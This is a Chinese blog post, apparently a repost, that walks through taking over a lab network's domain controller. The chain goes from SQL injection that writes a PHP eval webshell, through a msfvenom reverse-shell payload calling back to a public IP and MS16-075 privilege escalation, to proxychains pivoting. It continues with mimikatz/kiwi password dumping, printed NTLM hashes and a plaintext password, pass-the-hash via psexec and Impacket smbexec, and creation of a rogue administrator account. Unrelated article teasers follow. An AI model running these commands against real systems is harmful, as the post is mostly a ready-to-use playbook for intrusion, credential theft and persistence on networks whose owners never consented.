msf如何内网信息收集,内网信息收集工具

内网渗透拿域控

环境:http://afsgr16-b1ferw.aqlab.cn/?id=1

【查看资料】

1、进去一看,典型的sql注入

 

2、测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题

①将shell.php写入网站根目录,payload

 union select 1,"<?php eval($_REQUEST[gylq]);?>"  into outfile 'C:/phpstudy/www/shell.php'

 

②蚁剑连接,发现权限很低

msf如何内网信息收集,内网信息收集工具

 

kali机的提权和后渗透方法

提权我们可以传个木马用msf试试,获取按照系统补丁来搜payload提权等等,这里就用最快的方式,msf(注意:,下面讲关于kali中msf怎么**,方法太多了)

kali**用花生壳

拿到webshell之后,由于这个webshell是在公网的,无法访问我们内网的kali,所以我们得将kali中的某个端口映射到公网

下载花生壳

1、可以看到kali的内网ip为192.168.0.108

 

2、接着设置一下花生壳的配置

 

3、可以看到我们映射到公网的ip和端口

 

4、接着使用msf制作访问我们公网ip和端口的后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=103.46.128.46 LPORT=26240 -f exe > payload.exe

msf如何内网信息收集,内网信息收集工具

 

4、打开msf的监听

handler -x -H 192.168.0.108 -P 6666 -p windows/meterpreter/reverse_tcp

或者使用

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.108

set lport 6666

run

 

5、执行webshell中的木马

msf如何内网信息收集,内网信息收集工具

 

sessions 1 //进入会话

6、发现无法不是最高权限,getsystem/getprivs并未成功

msf如何内网信息收集,内网信息收集工具

 

7、一般使用最多的是ms16_075的方式提权了,这个成功率高,试试

但是由于我们是内网,所以就必须准备两个msf窗口才能使用msf的提取功能

①msf窗口1执行监听命令

msf如何内网信息收集,内网信息收集工具

 

②msf窗口2权限低的那个会话执行提权命令

run exploit/windows/local/ms16_075_reflection_juicy lhost=103.46.128.46 lport=26240

msf如何内网信息收集,内网信息收集工具

 

③接着监听的那个msf窗口1就获得了一个system权限的会话

msf如何内网信息收集,内网信息收集工具

 

看路由器命令

route

msf如何内网信息收集,内网信息收集工具

 

一般为了防止后门被人关掉,将其注入到其他程序中

ps 查看进程pid

msf如何内网信息收集,内网信息收集工具

 

接着用migrate将我们后门注入到1816中,有效防止木马挂了

migrate 1816

msf如何内网信息收集,内网信息收集工具

 

通过shell命令进入命令窗口

msf如何内网信息收集,内网信息收集工具

 

内网信息收集

可以通过ifconfig看到内网ip

msf如何内网信息收集,内网信息收集工具

 

接着利用后渗透工具ping方法扫一下ip段,接着扫出三个ip存活

info post/multi/gather/ping_sweep //查看所需参数

run post/multi/gather/ping_sweep rhosts=10.0.1.4/24 //扫网段

msf如何内网信息收集,内网信息收集工具

 

还有一种方法,arp扫ip段,用法差不多,这个扫得快一些比较推荐

run post/windows/gather/arp_scanner rhosts=10.0.1.4/24

msf如何内网信息收集,内网信息收集工具

 

这是利用msf自带工具扫描,接下来再演示使用nmap扫一下看看

首先添加一个路由如下命令

run get_local_subnets //查看网段

run autoroute -s 10.0.1.0/24

run autoroute -p //查看已添加的路由

background //保存session返回msf

msf如何内网信息收集,内网信息收集工具

 

接着开启socks4a服务,使用msf的辅助模块

use auxiliary/server/socks_proxy

set VERSION 4a //设置为socks4a

run

msf如何内网信息收集,内网信息收集工具

 

接着设置/etc/proxychains.conf 中的内容改为下面展示截图,kali自带的代理工具

vim /etc/proxychains.conf

msf如何内网信息收集,内网信息收集工具

 

接着我们就可以利用proxychains4来进行连接3389端口,和进行内网ip段扫描,使用nmap扫描其内网ip及其端口等,但是扫的真的慢是我网太卡了么。

proxychains4 nmap -sT -Pn -p 22,80,445,3306,3389 10.0.1.0/24 --open

msf如何内网信息收集,内网信息收集工具

 

看到好多445端口,这里其实可以用永恒之蓝的

当然,也可以选择不用nmap扫描端口,我们可以用msf的模块扫描端口

use auxiliary/scanner/portscan/tcp 

set rhosts 10.0.1.6

msf如何内网信息收集,内网信息收集工具

 

kali机用kiwi抓取密码

也可以直接抓取管理员密码

msf提供一些后渗透的模块

load -l 来查看有哪些模块

msf如何内网信息收集,内网信息收集工具

 

其实kiwi就是mimikatz就是换了个名在这里,然后加载kiwi

msf如何内网信息收集,内网信息收集工具

 

查看当前kiwi的命令用help

help

msf如何内网信息收集,内网信息收集工具

 

对10.0.1.4机子进行抓密码,接着执行下面命令,就可以获取管理员密码,这个是对登陆过的账号和密码进行抓取

kiwi_cmd privilege::debug

kiwi_cmd sekurlsa::logonpasswords

msf如何内网信息收集,内网信息收集工具

 

获得密码

u:administrator

p:woshifengge1.

kali机hash传递得到会话

看到445端口就可以尝试hash传递,在不需要密码的情况下使用,发现10.0.1.6-10.0.1.8可以被利用

hashdump可获取hash值,得是64位系统权限才可执行

hashdump 

或者是 

run post/windows/gather/hashdump

或者是

run  post/windows/gather/smart_hashdump

以上都可以获取hash值



background 返回

msf如何内网信息收集,内网信息收集工具

 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

test:1009:aad3b435b51404eeaad3b435b51404ee:77be122bef1c2d43f67721c95114f46b:::

通过网段知道6-8有445可以利用smb的hash传递连接10.0.1.8这台机子,因为一般情况几台机子的密码都相同。

use exploit/windows/smb/psexec

set payload windows/meterpreter/bind_tcp 

//正向连接

set SMBUser Administrator

set SMBPass aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83  #hashdump获取的hash值进行

msf如何内网信息收集,内网信息收集工具

 

msf如何内网信息收集,内网信息收集工具

 

这里发现10.0.1.8这台机子存在域控,dns一般是和域控绑定在一个服务器上的

shell

ipconfig /all

msf如何内网信息收集,内网信息收集工具

 

shell查看域的命令

shell中命令使用查看是否存在域的方法

这里明显A1这台机子处于域中

1、查看域中计算机

net view //查看域中的计算机

msf如何内网信息收集,内网信息收集工具

 

net view /domain //查看域

msf如何内网信息收集,内网信息收集工具

 

根据ipconfig /all 可以知道域控主机的ip是10.0.1.6

hash传递并不能登陆进去

2、查看域中的计算机

就一台A1,这里我们得通过A1去获得域控

net view /domain:ZKAQ

msf如何内网信息收集,内网信息收集工具

 

3、ping计算机名可以得到IP

ping A1

msf如何内网信息收集,内网信息收集工具

 

ping zkaq.cn

msf如何内网信息收集,内网信息收集工具

 

4、获得所有域的用户列表,有一个krbtgt就是域用户

net user /domain

msf如何内网信息收集,内网信息收集工具

 

5、获取域用户组信息

net group /domain

msf如何内网信息收集,内网信息收集工具

 

6、获取当前域管理员信息

net group "domain admins" /domain

msf如何内网信息收集,内网信息收集工具

 

7、查看域时间及域服务器的名字

net time /domain

msf如何内网信息收集,内网信息收集工具

 

通过域的信息收集得到DC.zkaq.cn 10.0.1.6这个就是域控

拓展,导入kiwi的命令使用

msf如何内网信息收集,内网信息收集工具

 

1、msv列出NTLM

kiwi_cmd sekurlsa::msv

msf如何内网信息收集,内网信息收集工具

 

2、kerberos抓密码,发现全部加密了

kiwi_cmd sekurlsa::kerberos

msf如何内网信息收集,内网信息收集工具

 

3、也可以用creds_all抓取密码,但也明显加密

creds_all

msf如何内网信息收集,内网信息收集工具

 

Username       Domain  NTLM

--------       ------  ----

A1$            ZKAQ    3bf63ae494aee3a74fa90a41b9459df9

Administrator  ZKAQ    61465a991b168727b65b3644aab823cd 

Administrator  A1      4d1de63584701c85b8b9eccf5243ef83

Impacket实现域控NTML的hash传递

这里发现密码是无法获取的,因为NTLM是密文,我们可以使用hash传递,不过这里得使用Impacket的包

首先我们要先去GitHub下载源码,或者直接使用

git clone 

然后解压缩,进入impacket

cd impacket/

然后运行

python setup.py install

工具都在这个目录里impacket/examples

cd impacket/examples

msf如何内网信息收集,内网信息收集工具

 

接着我们使用smbexec.py这个模块,用上面的ntml值hash传递登陆域控机子

proxychains4 python3 smbexec.py -hashes :61465a991b168727b65b3644aab823cd ZKAQ/Administrator@10.0.1.6

成功拿下域控的超级管理员权限

msf如何内网信息收集,内网信息收集工具

 

接下来是基础操作添加超管账号,然后登陆域控

net user gylq ********** /add #密码打长的,2008有限制,密码不能太简单

net localgroup administrators gylq /add #添加超管

msf如何内网信息收集,内网信息收集工具

 

直接代理登陆域控10.0.1.6就报错,这是域控机的守护机制

msf如何内网信息收集,内网信息收集工具

 

需要使用他域内的机子去登陆,我们先登陆10.0.1.8,再登陆域控

远程3389登陆域控

也可以用直接用抓取的密码来代理登陆3389的端口等,只是演示一下

如果对方没有开启远程连接,可以使用msf自带命令启动

run getgui -e

先登陆10.0.1.4,才发现这个不是域内机子,得去登陆10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.4

msf如何内网信息收集,内网信息收集工具

 

也可以用代理直接连接10.0.1.8,来进行确定

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

接着用10.0.1.8作为跳板登陆10.0.1.6,即域控机子

msf如何内网信息收集,内网信息收集工具

 

成功登陆域控

msf如何内网信息收集,内网信息收集工具

 

总结:这是kali中使用msf和impacket联合拿域控

本文来自投稿,不代表展天博客立场,如若转载,请注明出处:https://www.me900.com/326457.html

(0)

相关推荐

  • 贾浅浅最火的十首诗(贾浅浅的诗到底好不好)

    贾浅浅,著名作家、中国作协副主席贾平凹之女,西北大学文学院副教授,硕士生导师。贾平凹文学馆常务副馆长。鲁迅文学院32届高研班学员,参加第35届青春诗会,出席第八次全国青创会,陕西省青年文学协会副主席,作品散见于《诗刊》《作家》《十月》《钟山》《星星》《山花》等,出版诗集《第一百个夜晚》、《行走的海》、《椰子里的内陆湖》,荣获第二届陕西青年文学奖。入选2019…

    2023-02-03 投稿
  • 一个月20g纯流量卡哪个划算(纯流量卡停了一个月还可以用吗)

    那天我路过一个保洁阿姨时,她的电话响了,拿起来一看就挂掉了很蔑视地说:“广告!切~,现在谁还打电话啊,都是微信视频语音了”。 阿姨的表演深深震撼了我,当时我就想,阿姨之所以这么豪气,一定是用的不限量流量套餐…… 流量总是不够用?月底天天算着用?视频不敢点?到处蹭WIFI? 干嘛不办个不限量的流量套餐卡呢,从此流量随便用,视频随便点,抖音快手随便刷,再也不用蹭…

    2023-05-27 投稿
  • 海外婚礼策划方案,海外婚礼策划流程

    备婚是不是一头雾水? 办婚礼要做哪些事? 先做哪件后做哪件? 什么时候开始准备? 都需要订什么东西?   对于很多刚开始准备婚礼的新人们来说 这些问题相信大家都会遇到 别慌! 小编今天就奉上压箱底的备婚流程 照着做准没错~       DC Wedding音频:00:0004:56     &nbs…

    2022-04-22 投稿
  • 中超外援规则(fm2021中超外援规则)

    随着上海会议顺利结束,2021赛季中超联赛也步入开赛倒计时。与新赛季中超联赛筹备相关的各类遗留问题也有待职业联盟及各俱乐部最终“消化”。 北青-北京头条记者4月2日获悉,虽然截止到目前仍有20余名中超外援受疫情等因素影响滞留在海外,但鉴于现在距离新赛季中超联赛开赛仅有不足20天时间,各俱乐部大部分外援均已归队,中国足协与职业联盟筹备组经与俱乐部沟通后最终决定…

    2022-01-20
  • 芝加哥公牛队1998年阵容,谁是1998年nba总冠军

    1998年是芝加哥公牛队成就第二个三连冠的终结之年,他们在1991-1993和1996-1998取得了2次三连冠的伟业,这是现代篮球史上无法超越的经典瞬间。。 时间已经过去了整整23年,外媒FW详细解读了想当年夺冠的那12位球员现在的现状和当前情况,小编翻译过来以飨广大的篮球爱好者。 1.球队的FMVP获得者迈克尔乔丹现在是黄蜂队的大股东之一。20多年的沉淀…

    2023-06-02 投稿
  • 全家福支付宝,支付宝万能福卡怎么兑换

    2020支付宝万能卡可以转换成全家福卡吗?支付宝是我们在日常生活当中经常使用的一款支付软件了,支付宝上面的功能也是很面面俱到的,最近支付宝上面的集五福活动有很多人都在参加,那么2020支付宝万能卡可以转换成全家福卡吗?下面就和小编一起去看看吧! 2020支付宝万能卡可以转换成全家福卡吗 小编推荐:万能福每人最多能领用几张 1.首先来看一下万能福的作用,万能福…

    2023-07-06
  • 脖子皮肤松弛,脖子如何去皱

    ●颈部是很多人做皮肤护理时总是会遗忘的部位,大家总会把护理的重点放在脸部,因为脸部一天24小时都露在外面,是与人交往时对方首先注意到的地方,也是最吸引人眼球的地方。但其实,比起脸部,颈部是一个更容易衰老的地方,人们很容易就能从一个人的颈部看出她的真实年龄。所以,不要再忽视你的颈部肌肤的护理,让岁月的痕迹从你的颈部消失。   ●一些人认为,颈部隐藏在…

    2023-07-07 投稿
  • 免费gpu服务器(免费web服务器网站)

    自从 Tim Berners-Lee 在 1990 年开发 CERN httpd 以来,作为第一个 Web 浏览器的项目,Web 服务器已经走过了很长一段路。虽天一些主要的网络服务器供应商为企业提供了闭源的 web 服务器,但许多其他企业仍保留Tim Berners-Lee 所体现的开源价值。CERN httpd 的源代码于 1993 年公布。看着目前可用于…

    2021-12-18 投稿
  • 10万元投资项目,十万做什么生意利润大

    当前的实体经济领域,遭遇了从所未有的寒冬,特别是像一些小微规模的加工类企业,一死一大片,造成了社会上老赖成堆。那现在是不是所有的加工类企业都不能去做了?这肯定不是,只是项目的选择要慎重。我这里给大家推荐几个加工厂项目,投资基本在10万元以内,都比较适合在农村干,做好了一定会有钱赚。 塑料破碎厂 这个小加工厂项目做起来最简单,也稳妥赚钱。你只需要在农村找一个5…

    2023-02-01
  • 白象方便面股票(白象方便面股票走势)

    近日,315晚会曝光“土坑”酸菜乱象后,老坛酸菜牛肉面深陷舆论风波,各大销售平台如淘宝、京东、拼多多等已搜索不到“老坛酸菜牛肉面”相关商品信息。与此同时,白象方便面也被大家所熟知。原来,事件发生后,有人就去搜索了中国市面上的各大方便面平台,结果发现除白象外,其余的康师傅、统一、今麦郎品牌都有日资入股,只有白象属于真正意义上的国企,而白象之前做的义举也被扒了出…

    2023-05-28
  • 马云个人的简介(马云张向东简介及事迹)

    提起马云,可谓是无人不知,无人不晓。 作为阿里巴巴的创始人,马云不仅缔造了互联网行业帝国,他的事迹,也激励着一大批正在创业的年轻人。 今天很残酷,明天也很残酷,只要熬过明天晚上,后天你就会成功。 在马云创业成功后,他的头衔也多了许多,不仅是阿里巴巴董事局主席,同时还胜任TNC中国理事会主席、中国企业家俱乐部主席等多个职位。 在马云心中,无数的光环头衔,其实并…

    2022-01-07 投稿
  • 董洁新浪微博(董洁的个人新浪微博)

    董洁时隔5年首发微博,杨臣刚王大治意外躺枪 7月29日,已经5年没有更新过微博的演员董洁在终于上线了!虽然没有附文只是贴了两张自己的近照,不过依然让粉丝激动不已。照片发出不久,董洁的微博就被热情的网友攻陷了,一时间评论如潮。许多粉丝都是从《金粉世家》那一回眸就被当时清纯的董洁给惊艳到了,一直喜欢到现在。 自打跟前夫潘粤明离婚之后,董洁除了工作几乎没有跟观众互…

    2022-01-13 投稿